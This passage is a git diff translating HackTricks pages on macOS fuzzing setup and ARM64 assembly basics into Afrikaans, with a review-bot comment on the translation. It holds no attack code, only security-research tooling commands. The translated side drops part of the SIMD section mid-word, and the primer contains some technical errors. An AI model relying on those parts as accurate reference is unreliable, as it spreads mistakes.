@@ -427,48 +463,43 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Roo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist ``` +### Slaap -### Sleep - -While fuzzing in a MacOS it's important to not allow the Mac to sleep: +Terwyl jy in 'n MacOS fuzz, is dit belangrik om te verseker dat die Mac nie gaan slaap nie: * systemsetup -setsleep Never -* pmset, System Preferences +* pmset, Sisteemvoorkeure * [KeepingYouAwake](https://github.com/newmarcel/KeepingYouAwake) -#### SSH Disconnect +#### SSH Ontkoppel -If you are fuzzing via a SSH connection it's important to make sure the session isn't going to day. So change the sshd\_config file with: +As jy fuzz via 'n SSH-verbinding, is dit belangrik om seker te maak dat die sessie nie gaan afloop nie. Verander dus die sshd\_config-lêer met: * TCPKeepAlive Yes * ClientAliveInterval 0 * ClientAliveCountMax 0 - ```bash sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist ``` +### Interne Handlers -### Internal Handlers - -**Checkout the following page** to find out how you can find which app is responsible of **handling the specified scheme or protocol:** +**Kyk na die volgende bladsy** om uit te vind watter toepassing verantwoordelik is vir **die hanteer van die gespesifiseerde skema of protokol:** {% content-ref url="../macos-file-extension-apps.md" %} [macos-file-extension-apps.md](../macos-file-extension-apps.md) {% endcontent-ref %} -### Enumerating Network Processes - -This interesting to find processes that are managing network data: +### Enumerating Netwerkprosesse +Dit is interessant om prosesse te vind wat netwerkdata bestuur: ```bash dtrace -n 'syscall::recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' >> recv.log #wait some time sort -u recv.log > procs.txt cat procs.txt ``` - -Or use `netstat` or 
`lsof` +Of gebruik `netstat` of `lsof` ### Libgmalloc @@ -484,13 +515,13 @@ lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYL #### [AFL++](https://github.com/AFLplusplus/AFLplusplus) -Works for CLI tools +Werk vir CLI-hulpmiddels #### [Litefuzz](https://github.com/sec-tools/litefuzz) -It "**just works"** with macOS GUI tools. Note some some macOS apps have some specific requirements like unique filenames, the right extension, need to read the files from the sandbox (`~/Library/Containers/com.apple.Safari/Data`)... +Dit "**werk net"** met macOS GUI-hulpmiddels. Merk op dat sommige macOS-programme spesifieke vereistes het, soos unieke lêernaam, die regte uitbreiding, die lees van lêers uit die sandput (`~/Library/Containers/com.apple.Safari/Data`)... -Some examples: +Voorbeelde: {% code overflow="wrap" %} ```bash @@ -518,14 +549,14 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash ``` {% endcode %} -### More Fuzzing MacOS Info +### Meer Fuzzing MacOS-inligting * [https://www.youtube.com/watch?v=T5xfL9tEg44](https://www.youtube.com/watch?v=T5xfL9tEg44) * [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf) * [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben) * [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler) -## References +## Verwysings * [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) * [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44) @@ -534,14 +565,14 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
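Review bot: in the `@@ -427,48 +463,43 @@` region the heading `### Enumerating Netwerkprosesse` is only half translated (`### Enumerasie van netwerkprosesse`), and the blank line the `-` side kept between a closing code fence and the next heading is dropped in several places (`+### Slaap` and `+### Interne Handlers` now follow the fence directly); restore those blank lines so the headings are not glued to the code. In the fused `@@ -518` hunk, `### Meer Fuzzing MacOS-inligting` is an English word order with Afrikaans words; `### Meer inligting oor fuzzing op MacOS` is the natural phrasing. The `@@ -484` and `@@ -534` hunks read fine.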
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md index 42b035e18..c3cda07da 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -1,220 +1,186 @@ -# Introduction to ARM64v8 +# Inleiding tot ARM64v8
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## **Exception Levels - EL (ARM64v8)** +## **Uitsonderingsvlakke - EL (ARM64v8)** -In ARMv8 architecture, execution levels, known as Exception Levels (ELs), define the privilege level and capabilities of the execution environment. There are four exception levels, ranging from EL0 to EL3, each serving a different purpose: +In die ARMv8-argitektuur definieer uitvoeringsvlakke, bekend as Uitsonderingsvlakke (EL's), die voorregvlak en vermoëns van die uitvoeringsomgewing. Daar is vier uitsonderingsvlakke, wat wissel van EL0 tot EL3, elk met 'n ander doel: -1. **EL0 - User Mode**: - * This is the least-privileged level and is used for executing regular application code. - * Applications running at EL0 are isolated from each other and from the system software, enhancing security and stability. -2. **EL1 - Operating System Kernel Mode**: - * Most operating system kernels run at this level. - * EL1 has more privileges than EL0 and can access system resources, but with some restrictions to ensure system integrity. -3. **EL2 - Hypervisor Mode**: - * This level is used for virtualization. A hypervisor running at EL2 can manage multiple operating systems (each in its own EL1) running on the same physical hardware. - * EL2 provides features for isolation and control of the virtualized environments. -4. **EL3 - Secure Monitor Mode**: - * This is the most privileged level and is often used for secure booting and trusted execution environments. - * EL3 can manage and control accesses between secure and non-secure states (such as secure boot, trusted OS, etc.). +1. **EL0 - Gebruikersmodus**: +* Dit is die minste bevoorregte vlak en word gebruik vir die uitvoering van gewone toepassingskode. +* Toepassings wat op EL0 loop, is geïsoleer van mekaar en van die stelsel sagteware, wat die veiligheid en stabiliteit verbeter. +2. **EL1 - Bedryfstelsel-kernelmodus**: +* Die meeste bedryfstelsel-kernels loop op hierdie vlak. 
+* EL1 het meer voorregte as EL0 en kan toegang tot stelselhulpbronne verkry, maar met sekere beperkings om stelselintegriteit te verseker. +3. **EL2 - Hipervisormodus**: +* Hierdie vlak word gebruik vir virtualisering. 'n Hipervisor wat op EL2 loop, kan verskeie bedryfstelsels (elk in sy eie EL1) bestuur wat op dieselfde fisiese hardeware loop. +* EL2 bied funksies vir isolasie en beheer van die gevirtualiseerde omgewings. +4. **EL3 - Veilige Monitor-modus**: +* Dit is die mees bevoorregte vlak en word dikwels gebruik vir veilige opstart en vertroude uitvoeringsomgewings. +* EL3 kan toegang tussen veilige en nie-veilige toestande bestuur en beheer (soos veilige opstart, vertroude bedryfstelsel, ens.). -The use of these levels allows for a structured and secure way to manage different aspects of the system, from user applications to the most privileged system software. ARMv8's approach to privilege levels helps in effectively isolating different system components, thereby enhancing the security and robustness of the system. +Die gebruik van hierdie vlakke maak dit moontlik om verskillende aspekte van die stelsel op 'n gestruktureerde en veilige manier te bestuur, van gebruikerstoepassings tot die mees bevoorregte stelselsagteware. ARMv8 se benadering tot voorregvlakke help om verskillende stelselkomponente doeltreffend te isoleer, wat die veiligheid en robuustheid van die stelsel verbeter. ## **Registers (ARM64v8)** -ARM64 has **31 general-purpose registers**, labeled `x0` through `x30`. Each can store a **64-bit** (8-byte) value. For operations that require only 32-bit values, the same registers can be accessed in a 32-bit mode using the names w0 through w30. +ARM64 het **31 algemene doelregisters**, gemerk as `x0` tot `x30`. Elkeen kan 'n **64-bis** (8-byte) waarde stoor. Vir bewerkings wat slegs 32-bis waardes vereis, kan dieselfde registers in 'n 32-bis modus benader word deur die name w0 tot w30 te gebruik. -1. 
**`x0`** to **`x7`** - These are typically used as scratch registers and for passing parameters to subroutines. - * **`x0`** also carries the return data of a function -2. **`x8`** - In the Linux kernel, `x8` is used as the system call number for the `svc` instruction. **In macOS the x16 is the one used!** -3. **`x9`** to **`x15`** - More temporary registers, often used for local variables. -4. **`x16`** and **`x17`** - **Intra-procedural Call Registers**. Temporary registers for immediate values. They are also used for indirect function calls and PLT (Procedure Linkage Table) stubs. - * **`x16`** is used as the **system call number** for the **`svc`** instruction in **macOS**. -5. **`x18`** - **Platform register**. It can be used as a general-purpose register, but on some platforms, this register is reserved for platform-specific uses: Pointer to current thread environment block in Windows, or to point to the currently **executing task structure in linux kernel**. -6. **`x19`** to **`x28`** - These are callee-saved registers. A function must preserve these registers' values for its caller, so they are stored in the stack and recovered before going back to the caller. -7. **`x29`** - **Frame pointer** to keep track of the stack frame. When a new stack frame is created because a function is called, the **`x29`** register is **stored in the stack** and the **new** frame pointer address is (**`sp`** address) is **stored in this registry**. - * This register can also be used as a **general-purpose registry** although it's usually used as reference to **local variables**. -8. **`x30`** or **`lr`**- **Link register** . It holds the **return address** when a `BL` (Branch with Link) or `BLR` (Branch with Link to Register) instruction is executed by storing the **`pc`** value in this register. - * It could also be used like any other register. -9. **`sp`** - **Stack pointer**, used to keep track of the top of the stack. 
- * the **`sp`** value should always be kept to at least a **quadword** **alignment** or a alignment exception may occur. -10. **`pc`** - **Program counter**, which points to the next instruction. This register can only be updates through exception generations, exception returns, and branches. The only ordinary instructions that can read this register are branch with link instructions (BL, BLR) to store the **`pc`** address in **`lr`** (Link Register). -11. **`xzr`** - **Zero register**. Also called **`wzr`** in it **32**-bit register form. Can be used to get the zero value easily (common operation) or to perform comparisons using **`subs`** like **`subs XZR, Xn, #10`** storing the resulting data nowhere (in **`xzr`**). +1. **`x0`** tot **`x7`** - Hierdie word tipies gebruik as skrapsregisters en vir die deurgee van parameters na subroetines. +* **`x0`** dra ook die terugvoerdata van 'n funksie. +2. **`x8`** - In die Linux-kernel word `x8` gebruik as die stelseloproepnommer vir die `svc`-instruksie. **In macOS is x16 die een wat gebruik word!** +3. **`x9`** tot **`x15`** - Meer tydelike registers, dikwels gebruik vir plaaslike veranderlikes. +4. **`x16`** en **`x17`** - **Intra-prosedurale Oproepregisters**. Tydelike registers vir onmiddellike waardes. Hulle word ook gebruik vir indirekte funksie-oproepe en PLT (Procedure Linkage Table) stubs. +* **`x16`** word gebruik as die **stelseloproepnommer** vir die **`svc`**-instruksie in **macOS**. +5. **`x18`** - **Platformregister**. Dit kan as 'n algemene doelregister gebruik word, maar op sommige platforms is hierdie register gereserveer vir platformspefifieke gebruike: Wysiger na die huidige draadomgewingsblok in Windows, of om te wys na die tans **uitvoerende taakstruktuur in die Linux-kernel**. +6. **`x19`** tot **`x28`** - Hierdie is callee-bewaarregisters. 
'n Funksie moet hierdie registers se waardes bewaar vir sy aanroeper, sodat hulle in die stapel gestoor en herstel word voordat teruggekeer word na die aanroeper. +7. **`x29`** - **Raamregister** om die stapelraam dop te hou. Wanneer 'n nuwe stapelraam geskep word omdat 'n funksie geroep word, word die **`x29`**-register **in die stapel gestoor** en die nuwe raamregisteradres is (**`sp`**-adres) is **in hierdie register gestoor**. +* Hierdie register kan ook as 'n **algemene doelregister** gebruik word, alhoewel dit gewoonlik gebruik word as verwysing na **plaaslike veranderlikes**. +8. **`x30`** of **`lr`**- **Skakelregister**. Dit hou die **terugkeeradres** wanneer 'n `BL` (Branch with Link) of `BLR` (Branch with Link to Register) instruksie uitgevoer word deur die **`pc`**-waarde in hierdie register te stoor. +* Dit kan ook soos enige ander register gebruik word. +9. **`sp`** - **Stapelwyser**, gebruik om die boonste gedeelte van die stapel dop te hou. +* Die waarde van **`sp`** moet altyd minstens 'n **quadword-uitlyning** behou of 'n uitlyningsuitsondering kan voorkom. +10. **`pc`** - **Programteller**, wat na die volgende instruksie wys. Hierdie register kan slegs opgedateer word deur uitsonderingsgenerasies, uitsonderingsterugkeer en spronge. Die enigste gewone instruksies wat hierdie register kan lees, is sprong met skakelinstruksies (BL, BLR) om die **`pc`**-adres in **`lr`** (Skakelregister) te stoor. +11. **`xzr`** - **Nulregister**. Ook genoem **`wzr`** in sy **32**-bis registervorm. Dit kan gebruik word om die nulwaarde maklik te verkry (gewone bewerking) of om vergelykings uit te voer met behulp van **`subs`** soos **`subs XZR, Xn, #10`** sonder om die resultaatdata enige plek te stoor (in **`xzr`**). -The **`Wn`** registers are the **32bit** version of the **`Xn`** register. +Die **`Wn`**-registers is die **32-bis**-weergawe van die **`Xn`**-register. 
-### SIMD and Floating-Point Registers - -Moreover, there are another **32 registers of 128bit length** that can be used in optimized single instruction multiple data (SIMD) operations and for performing floating-point arithmetic. These are called the Vn registers although they can also operate in **64**-bit, **32**-bit, **16**-bit and **8**-bit and then they are called **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** and **`Bn`**. - -### System Registers - -**There are hundreds of system registers**, also called special-purpose registers (SPRs), are used for **monitoring** and **controlling** **processors** behaviour.\ -They can only be read or set using the dedicated special instruction **`mrs`** and **`msr`**. - -The special registers **`TPIDR_EL0`** and **`TPIDDR_EL0`** are commonly found when reversing engineering. The `EL0` suffix indicates the **minimal exception** from which the register can be accessed (in this case EL0 is the regular exception (privilege) level regular programs runs with).\ -They are often used to store the **base address of the thread-local storage** region of memory. Usually the first one is readable and writable for programs running in EL0, but the second can be read from EL0 and written from EL1 (like kernel). 
- -* `mrs x0, TPIDR_EL0 ; Read TPIDR_EL0 into x0` -* `msr TPIDR_EL0, X0 ; Write x0 into TPIDR_EL0` +### SIMD- en Drijfpuntregisters +Daar is ook nog **32 registers van 128-bis lengte** wat gebruik kan word in geoptimalise ### **PSTATE** -**PSTATE** contains several process components serialized into the operating-system-visible **`SPSR_ELx`** special register, being X the **permission** **level of the triggered** exception (this allows to recover the process state when the exception ends).\ -These are the accessible fields: +**PSTATE** bevat verskeie proseskomponente wat geserializeer is in die bedryfstelsel-sigbare **`SPSR_ELx`** spesiale register, waar X die **toestemmingsvlak van die geaktiveerde** uitsondering is (dit maak dit moontlik om die prosesstaat te herstel wanneer die uitsondering eindig).\ +Hierdie is die toeganklike velde:
-* The **`N`**, **`Z`**, **`C`** and **`V`** condition flags: - * **`N`** means the operation yielded a negative result - * **`Z`** means the operation yielded zero - * **`C`** means the operation carried - * **`V`** means the operation yielded a signed overflow: - * The sum of two positive numbers yields a negative result. - * The sum of two negative numbers yields a positive result. - * In subtraction, when a large negative number is subtracted from a smaller positive number (or vice versa), and the result cannot be represented within the range of the given bit size. +* Die **`N`**, **`Z`**, **`C`** en **`V`** kondisie-vlae: +* **`N`** beteken die bewerking het 'n negatiewe resultaat opgelewer +* **`Z`** beteken die bewerking het nul opgelewer +* **`C`** beteken die bewerking het gedra +* **`V`** beteken die bewerking het 'n getekende oorvloei opgelewer: +* Die som van twee positiewe getalle lewer 'n negatiewe resultaat op. +* Die som van twee negatiewe getalle lewer 'n positiewe resultaat op. +* By aftrekking, wanneer 'n groot negatiewe getal van 'n kleiner positiewe getal afgetrek word (of andersom), en die resultaat nie binne die reeks van die gegewe bitgrootte verteenwoordig kan word nie. {% hint style="warning" %} -Not all the instructions update these flags. Some like **`CMP`** or **`TST`** do, and others that have an s suffix like **`ADDS`** also do it. +Nie al die instruksies werk hierdie vlae by nie. Sommige soos **`CMP`** of **`TST`** doen dit, en ander wat 'n s-suffix het soos **`ADDS`** doen dit ook. {% endhint %} -* The current **register width (`nRW`) flag**: If the flag holds the value 0, the program will run in the AArch64 execution state once resumed. -* The current **Exception Level** (**`EL`**): A regular program running in EL0 will have the value 0 -* The **single stepping** flag (**`SS`**): Used by debuggers to single step by setting the SS flag to 1 inside **`SPSR_ELx`** through an exception. 
The program will run a step and issue a single step exception. -* The **illegal exception** state flag (**`IL`**): It's used to mark when a privileged software performs an invalid exception level transfer, this flag is set to 1 and the processor triggers an illegal state exception. -* The **`DAIF`** flags: These flags allow a privileged program to selectively mask certain external exceptions. - * If **`A`** is 1 it means **asynchronous aborts** will be triggered. The **`I`** configures to respond to external hardware **Interrupts Requests** (IRQs). and the F is related to **Fast Interrupt Requests** (FIRs). -* The **stack pointer select** flags (**`SPS`**): Privileged programs running in EL1 and above can swap between using their own stack pointer register and the user-model one (e.g. between `SP_EL1` and `EL0`). This switching is performed by writing to the **`SPSel`** special register. This cannot be done from EL0. +* Die huidige **registerbreedte (`nRW`) vlag**: As die vlag die waarde 0 bevat, sal die program in die AArch64-uitvoeringsstaat loop sodra dit hervat word. +* Die huidige **Uitsonderingsvlak** (**`EL`**): 'n Gewone program wat in EL0 loop, sal die waarde 0 hê +* Die **enkelstap-vlag** (**`SS`**): Gebruik deur aflynontleders om enkelstappe te neem deur die SS-vlag na 1 binne **`SPSR_ELx`** te stel deur 'n uitsondering. Die program sal 'n stap neem en 'n enkelstap-uitsondering uitreik. +* Die onwettige-uitsonderingstatus-vlag (**`IL`**): Dit word gebruik om aan te dui wanneer 'n bevoorregte sagteware 'n ongeldige uitsonderingsvlak-oordrag uitvoer, hierdie vlag word na 1 gestel en die verwerker reik 'n onwettige-toestand-uitsondering uit. +* Die **`DAIF`**-vlakke: Hierdie vlae maak dit vir 'n bevoorregte program moontlik om sekere eksterne uitsonderings selektief te maskeer. +* As **`A`** 1 is, beteken dit dat **asynchrone afbreke** geaktiveer sal word. Die **`I`** stel dit in om te reageer op eksterne hardeware **Interrupt-aanvrae** (IRQ's). 
en die F is verband hou met **Vinnige Onderbrekingsaanvrae** (FIR's). +* Die **stapelwyserkies-vlae** (**`SPS`**): Bevoorregte programme wat in EL1 en hoër loop, kan wissel tussen die gebruik van hul eie stapelwyserregister en die gebruikersmodel een (bv. tussen `SP_EL1` en `EL0`). Hierdie oorskakeling word uitgevoer deur te skryf na die **`SPSel`** spesiale register. Dit kan nie vanaf EL0 gedoen word nie. -## **Calling Convention (ARM64v8)** +## **Oproepkonvensie (ARM64v8)** -The ARM64 calling convention specifies that the **first eight parameters** to a function are passed in registers **`x0` through `x7`**. **Additional** parameters are passed on the **stack**. The **return** value is passed back in register **`x0`**, or in **`x1`** as well **if its 128 bits long**. The **`x19`** to **`x30`** and **`sp`** registers must be **preserved** across function calls. +Die ARM64-oproepkonvensie spesifiseer dat die **eerste agt parameters** na 'n funksie deurgegee word in die registers **`x0` tot `x7`**. **Addisionele** parameters word op die **stapel** deurgegee. Die **terugkeerwaarde** word teruggegee in die register **`x0`**, of in **`x1`** ook **as dit 128 bits lank is**. Die **`x19`** tot **`x30`** en **`sp`** registers moet behou word oor funksie-oproepe. -When reading a function in assembly, look for the **function prologue and epilogue**. The **prologue** usually involves **saving the frame pointer (`x29`)**, **setting** up a **new frame pointer**, and a**llocating stack space**. The **epilogue** usually involves **restoring the saved frame pointer** and **returning** from the function. +Wanneer 'n funksie in samestelling gelees word, soek na die **funksieproloog en epiloog**. Die **proloog** behels gewoonlik die **bewaring van die raampunt (`x29`)**, die **opstel** van 'n **nuwe raampunt**, en die **toekenning van stapelruimte**. Die **epiloog** behels gewoonlik die **herstel van die bewaarde raampunt** en die **terugkeer** uit die funksie. 
-### Calling Convention in Swift +### Oproepkonvensie in Swift -Swift have its own **calling convention** that can be found in [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64) +Swift het sy eie **oproepkonvensie** wat gevind kan word by [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64) -## **Common Instructions (ARM64v8)** +## **Gewone Instruksies (ARM64v8)** -ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where **`opcode`** is the **operation** to be performed (such as `add`, `sub`, `mov`, etc.), **`dst`** is the **destination** register where the result will be stored, and **`src1`** and **`src2`** are the **source** registers. Immediate values can also be used in place of source registers. +ARM64-instruksies het gewoonlik die **formaat `opcode dst, src1, src2`**, waar **`opcode`** die **bewerking** is wat uitgevoer moet word (soos `add`, `sub`, `mov`, ens.), **`dst`** die **bestemmingsregister** is waarin die resultaat gestoor sal word, en **`src1`** en **`src2`** die **bronregisters** is. Onmiddellike waardes kan ook gebruik word in plaas van bronregisters. -* **`mov`**: **Move** a value from one **register** to another. - * Example: `mov x0, x1` — This moves the value from `x1` to `x0`. -* **`ldr`**: **Load** a value from **memory** into a **register**. - * Example: `ldr x0, [x1]` — This loads a value from the memory location pointed to by `x1` into `x0`. -* **`str`**: **Store** a value from a **register** into **memory**. - * Example: `str x0, [x1]` — This stores the value in `x0` into the memory location pointed to by `x1`. -* **`ldp`**: **Load Pair of Registers**. This instruction **loads two registers** from **consecutive memory** locations. 
The memory address is typically formed by adding an offset to the value in another register. - * Example: `ldp x0, x1, [x2]` — This loads `x0` and `x1` from the memory locations at `x2` and `x2 + 8`, respectively. -* **`stp`**: **Store Pair of Registers**. This instruction **stores two registers** to **consecutive memory** locations. The memory address is typically formed by adding an offset to the value in another register. - * Example: `stp x0, x1, [x2]` — This stores `x0` and `x1` to the memory locations at `x2` and `x2 + 8`, respectively. -* **`add`**: **Add** the values of two registers and store the result in a register. - * Syntax: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX] - * Xn1 -> Destination - * Xn2 -> Operand 1 - * Xn3 | #imm -> Operando 2 (register or immediate) - * \[shift #N | RRX] -> Performa shift or call RRX - * Example: `add x0, x1, x2` — This adds the values in `x1` and `x2` together and stores the result in `x0`. - * `add x5, x5, #1, lsl #12` — This equals to 4096 (a 1 shifter 12 times) -> 1 0000 0000 0000 0000 - * **`adds`** This perform an `add` and updates the flags -* **`sub`**: **Subtract** the values of two registers and store the result in a register. - * Check **`add`** **syntax**. - * Example: `sub x0, x1, x2` — This subtracts the value in `x2` from `x1` and stores the result in `x0`. - * **`subs`** This is like sub but updating the flag -* **`mul`**: **Multiply** the values of **two registers** and store the result in a register. - * Example: `mul x0, x1, x2` — This multiplies the values in `x1` and `x2` and stores the result in `x0`. -* **`div`**: **Divide** the value of one register by another and store the result in a register. - * Example: `div x0, x1, x2` — This divides the value in `x1` by `x2` and stores the result in `x0`. 
-* **`lsl`**, **`lsr`**, **`asr`**, **`ror`, `rrx`**: - * **Logical shift left**: Add 0s from the end moving the other bits forward (multiply by n-times 2) - * **Logical shift right**: Add 1s at the beginning moving the other bits backward (divide by n-times 2 in unsigned) - * **Arithmetic shift right**: Like **`lsr`**, but instead of adding 0s if the most significant bit is a 1, **1s are added (**divide by ntimes 2 in signed) - * **Rotate right**: Like **`lsr`** but whatever is removed from the right it's appended to the left - * **Rotate Right with Extend**: Like **`ror`**, but with the carry flag as the "most significant bit". So the carry flag is moved to the bit 31 and the removed bit to the carry flag. -* **`bfm`**: **Bit Filed Move**, these operations **copy bits `0...n`** from a value an place them in positions **`m..m+n`**. The **`#s`** specifies the **leftmost bit** position and **`#r`** the **rotate right amount**. - * Bitfiled move: `BFM Xd, Xn, #r` - * Signed Bitfield move: `SBFM Xd, Xn, #r, #s` - * Unsigned Bitfield move: `UBFM Xd, Xn, #r, #s` -* **Bitfield Extract and Insert:** Copy a bitfield from a register and copies it to another register. - * **`BFI X1, X2, #3, #4`** Insert 4 bits from X2 from the 3rd bit of X1 - * **`BFXIL X1, X2, #3, #4`** Extract from the 3rd bit of X2 four bits and copy them to X1 - * **`SBFIZ X1, X2, #3, #4`** Sign-extends 4 bits from X2 and inserts them into X1 starting at bit position 3 zeroing the right bits - * **`SBFX X1, X2, #3, #4`** Extracts 4 bits starting at bit 3 from X2, sign extends them, and places the result in X1 - * **`UBFIZ X1, X2, #3, #4`** Zero-extends 4 bits from X2 and inserts them into X1 starting at bit position 3 zeroing the right bits - * **`UBFX X1, X2, #3, #4`** Extracts 4 bits starting at bit 3 from X2 and places the zero-extended result in X1. 
-* **Sign Extend To X:** Extends the sign (or adds just 0s in the unsigned version) of a value to be able to perform operations with it: - * **`SXTB X1, W2`** Extends the sign of a byte **from W2 to X1** (`W2` is half of `X2`) to fill the 64bits - * **`SXTH X1, W2`** Extends the sign of a 16bit number **from W2 to X1** to fill the 64bits - * **`SXTW X1, W2`** Extends the sign of a byte **from W2 to X1** to fill the 64bits - * **`UXTB X1, W2`** Adds 0s (unsigned) to a byte **from W2 to X1** to fill the 64bits -* **`extr`:** Extracts bits from a specified **pair of registers concatenated**. - * Example: `EXTR W3, W2, W1, #3` This will **concat W1+W2** and get **from bit 3 of W2 up to bit 3 of W1** and store it in W3. -* **`bl`**: **Branch** with link, used to **call** a **subroutine**. Stores the **return address in `x30`**. - * Example: `bl myFunction` — This calls the function `myFunction` and stores the return address in `x30`. -* **`blr`**: **Branch** with Link to Register, used to **call** a **subroutine** where the target is **specified** in a **register**. Stores the return address in `x30`. - * Example: `blr x1` — This calls the function whose address is contained in `x1` and stores the return address in `x30`. -* **`ret`**: **Return** from **subroutine**, typically using the address in **`x30`**. - * Example: `ret` — This returns from the current subroutine using the return address in `x30`. -* **`cmp`**: **Compare** two registers and set condition flags. It's an **alias of `subs`** setting the destination register to the zero register. Useful to know if `m == n`. - * It supports the **same syntax as `subs`** - * Example: `cmp x0, x1` — This compares the values in `x0` and `x1` and sets the condition flags accordingly. -* **`cmn`**: **Compare negative** operand. In this case it's an **alias of `adds`** and supports the same syntax. Useful to know if `m == -n`. 
-* **tst**: It checks if any of the values of a reg is 1 (it works like and ANDS without storing the result anywhere) - * Example: `tst X1, #7` Check if any of the last 3 bits of X1 is 1 -* **`b.eq`**: **Branch if equal**, based on the previous `cmp` instruction. - * Example: `b.eq label` — If the previous `cmp` instruction found two equal values, this jumps to `label`. -* **`b.ne`**: **Branch if Not Equal**. This instruction checks the condition flags (which were set by a previous comparison instruction), and if the compared values were not equal, it branches to a label or address. - * Example: After a `cmp x0, x1` instruction, `b.ne label` — If the values in `x0` and `x1` were not equal, this jumps to `label`. -* **`cbz`**: **Compare and Branch on Zero**. This instruction compares a register with zero, and if they are equal, it branches to a label or address. - * Example: `cbz x0, label` — If the value in `x0` is zero, this jumps to `label`. -* **`cbnz`**: **Compare and Branch on Non-Zero**. This instruction compares a register with zero, and if they are not equal, it branches to a label or address. - * Example: `cbnz x0, label` — If the value in `x0` is non-zero, this jumps to `label`. -* **`adrp`**: Compute the **page address of a symbol** and store it in a register. - * Example: `adrp x0, symbol` — This computes the 